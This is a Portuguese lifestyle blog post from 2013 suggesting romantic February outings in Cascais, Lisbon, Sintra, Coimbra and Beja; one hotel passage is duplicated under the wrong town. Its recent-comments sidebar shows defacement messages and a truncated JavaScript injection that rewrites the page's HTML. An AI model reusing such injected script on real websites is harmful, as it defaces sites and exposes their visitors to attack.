Lifecooler @ 18:31

Ter, 05/02/13

Para este mês de Fevereiro, mês do amor e do carnaval, francisco Gomes traz-lhe o roteiro mais romãntico!

 

1 – ROMANCE NA QUINTA DA MARINHA
HOTEL DE LUXO – 5 estrelas
Hotel Quinta da Marinha Resort
Onde: Quinta da Marinha - Cascais

Uma noite de luxo, para momentos especiais no meio de vários elementos (mar, campo, serra) e perto de Lisboa.
Entre Cascais, o azul do Oceano do Guincho e o verde da serra de Sintra venha conhecer um refúgio de tranquilidade e romantismo.

Situado na Quinta da Marinha rodeado por belos jardins e por um extenso pinhal, o 5 estrelas Hotel Quinta da Marinha Resort integra-se harmoniosamente na paisagem envolvente. Interior e exterior misturam-se em ambientes de água, mar, lagos e piscinas e da vegetação, da serra e do golfe.


2 – Sabores da América do Sul no único Restaurante Peruano em Portugal

QOSQO
Onde: Lisboa

O Qosqo abriu portas em julho do ano passado com uma ementa de petiscos escrita a giz, para mais facilmente variar ao sabor das vontades do chefe e da disponibilidade dos alimentos, muitos importados, ou da frescura do peixe. Mas agora há ementa fixa, pratos quentes e uma nova chefe, Sara Zegarra acabada de chegar do Peru há 4 semanas para manter a genuinidade dos sabores dos Andes.         
Os individuais de padrões andinos dão o mote decorativo e a sala principal é dominada pelo cenário grandioso de Machu Pichu, que ocupa totalmente uma das paredes.
3 – Destinos românticos de Portugal

Sem preconceitos de sermos pirosos, queques ou vanguardistas, resolvemos dar uma ajuda ao Cupido deixando aqui algumas dicas para alegrar o seu 14 de fevereiro e, já agora, o resto do ano...  

SINTRA
Pela primeira vez aberta ao público, o conjunto patrimonial do Chalet e Jardim da Condessa d´Edla, integrado no Parque da Pena, é visitável desde Maio de 2011. Após longas e profundas obras de restauro, que devolveram a este refúgio sintrense todo o seu caráter romântico e cénico, é possível agora desfrutar deste património. O Chalet é um edifício do séc. XIX, de traça romântica, mandado construir pelo rei D. Fernando II para a sua segunda mulher, Elise Hensler, Condessa d´Edla, um local de refúgio para si e para a sua amada. O chalé foi inspirado nas construções da região dos Alpes.


O projeto de reconstrução teve como objetivo devolver ao Chalet o seu estado original, incluindo o restauro e a reintegração dos elementos que resistiram à ruína. O portão e a Casa do Guarda do Chalet foram também objeto de recuperação, sendo aqui que funciona o acolhimento dos visitantes e o centro de interpretação ambiental.
Quinta das Lágrimas – palácio, atualmente convertido em hotel, inserido num cenário de grande beleza, onde ainda vivem memórias dos amores entre o príncipe Dom Pedro e a bela Dona Inês. A quinta mantém intacta a atmosfera romântica de outros tempos. Conta-se que foi aqui que Dona Inês de Castro viu a morte, através dos punhais dos fidalgos, a quem o rei Dom Afonso IV encomendou a sua morte. O local onde morreu foi designado por Fonte das Lágrimas pelo poeta Luís de Camões. (Imóvel de Interesse Público).

Trata-se do primeiro jardim medieval totalmente reconstruído em Portugal, tendo como fonte de inspiração iluminuras, tapeçarias e literatura da época.


Museu Regional de Beja / Museu Rainha Dona Leonor – Antigo Convento de Nossa Senhora da Conceição de onde Soror Mariana Alcoforado aí em clausura via passar o Marquês de Chamilly e assistia às manobras do exército (cerca de 1667 e 1668). Mariana Alcoforado é considerada a autora das cinco Lettres Portugaises (As Cartas Portuguesas) dirigidas ao Marquês Noel Bouton de Chamilly, Conde de Saint-Léger e oficial francês, que lutou em solo português sob as ordens de Frederico de Schomberg, durante a Guerra da Restauração. A sua obra Cartas Portuguesas tornou-se num famoso clássico da literatura universal.

 

COIMBRA
Quinta das Lágrimas – palácio, atualmente convertido em hotel, inserido num cenário de grande beleza, onde ainda vivem memórias dos amores entre o príncipe Dom Pedro e a bela Dona Inês. A quinta mantém intacta a atmosfera romântica de outros tempos. Conta-se que foi aqui que Dona Inês de Castro viu a morte, através dos punhais dos fidalgos, a quem o rei Dom Afonso IV encomendou a sua morte. O local onde morreu foi designado por Fonte das Lágrimas pelo poeta Luís de Camões. (Imóvel de Interesse Público).

Trata-se do primeiro jardim medieval totalmente reconstruído em Portugal, tendo como fonte de inspiração iluminuras, tapeçarias e literatura da época.

 

Curiosa!?! Então não perca no Mais Mulher desta quarta-feira, às 17:30, na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO